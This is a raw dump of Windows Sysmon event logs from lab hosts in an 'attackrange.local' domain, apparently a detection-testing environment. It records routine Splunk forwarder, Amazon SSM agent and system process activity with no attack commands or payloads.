Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x800000000000000057350630Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057350629Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057350628Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057350627Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057350626Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2trueSplunk, Inc.Valid 10341000x800000000000000057350625Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-8868-6164-0500-00000000F101}424520C:\Windows\system32\csrss.exe{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057350624Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057350623Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.254{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057350622Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:11.253{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350621Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:11.253{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350620Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:11.253{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350619Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:11.253{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350618Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:11.253{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350617Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:11.253{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057350616Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.053{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350615Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.053{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8D818D3699821DDC6A33E6F3584C6BD,SHA256=ADE8968D9FEB8BE5691DAC7501807F81CEFFC260DA2E160F7D0E9E36BF86E3E6falsetrue 11241100x800000000000000057350614Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.035{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350613Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.035{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AFB51EA34FB2409892612A30BC4F4746,SHA256=76C6B7AC5CFF4E389DEDEA8592DDF1418DE35F9C39A7582A16947DE8F29D5BF0falsetrue 11241100x800000000000000057350612Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.015{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350611Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.015{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52705A5F7C5ECEFF9043BBD85EDB6F2F,SHA256=EEA877CBFAC363A502994FBCFFC37324AA74A45BBBEBE5847C9995093248DCBAfalsetrue 23542300x800000000000000057350745Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:12.885{8B6011A9-887D-6164-2C00-00000000F101}2924NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\respondent-20211011185456-44548MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63Bfalsetrue 11241100x800000000000000057350744Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:12.884{8B6011A9-887F-6164-4300-00000000F101}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\tmp\respondent-20211011185456-445482021-11-12 12:19:12.884 11241100x800000000000000057350743Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:12.883{8B6011A9-887D-6164-2C00-00000000F101}2924C:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\tmp\surveyor-20211011185454-445492021-11-12 12:19:12.883 11241100x800000000000000057350742Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:12.683{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350741Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:12.683{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=304780BE0BA1CF3C8439ED4C87E90F6F,SHA256=98FE6ED772A2B9334CCB8626160E32A1F0575DEA63EB665E964DE0F3F93ED540falsetrue 23542300x800000000000000021219965Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:12.690{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1E03A489ACF1124B20C5ACA87BA5B96,SHA256=38366F0CE633834F52D8339D23F0F5534DCE337E20621528492B8C0D2CDED766,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000021219964Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:59.629{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64347-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x800000000000000021219963Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:59.551{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64346-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 10341000x800000000000000021219962Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:12.519{AD5E2759-5BC0-618E-1DCE-08000000F101}56006060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219961Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:12.269{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5BC0-618E-1DCE-08000000F101}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219960Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:12.269{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219959Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:12.269{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219958Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:12.269{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219957Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:12.269{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219956Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:12.269{AD5E2759-5432-6143-0500-00000000F101}412428C:\Windows\system32\csrss.exe{AD5E2759-5BC0-618E-1DCE-08000000F101}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219955Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:12.269{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5BC0-618E-1DCE-08000000F101}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219954Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:12.254{AD5E2759-5BC0-618E-1DCE-08000000F101}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000057350740Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:41.448{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local54577-false142.250.69.202sea30s08-in-f10.1e100.net443https 11241100x800000000000000057350739Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:12.268{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350738Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:12.268{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A374D57E73F14841B857F408A24A11DE,SHA256=78279B1430E9E090FC4A725187739B1E332F1515269F806D8DDCFCCF18D3CAF7falsetrue 534500x800000000000000057350737Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:12.137{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057350736Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:12.137{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057350735Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:12.137{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057350734Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:12.137{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 23542300x800000000000000057350790Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.885{8B6011A9-887D-6164-2C00-00000000F101}2924NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\surveyor-20211011185454-44549MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7falsetrue 11241100x800000000000000057350789Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.799{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350788Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:13.799{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57AD90874B3199F84B1C7D473C9D92BE,SHA256=DA7634771714E4C6DF1E6551E263F0228E9F0D618DBFFA1BA181AF997C1F4C16falsetrue 23542300x800000000000000021219967Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:13.691{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E0AE7A2391781CFB5CF1A71AC52270E,SHA256=6079A46C9B4A6E134CE9BFB0F59C4DC9E9F7B11888DCE5A6AC3CE810E4926908,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057350787Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:13.116{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 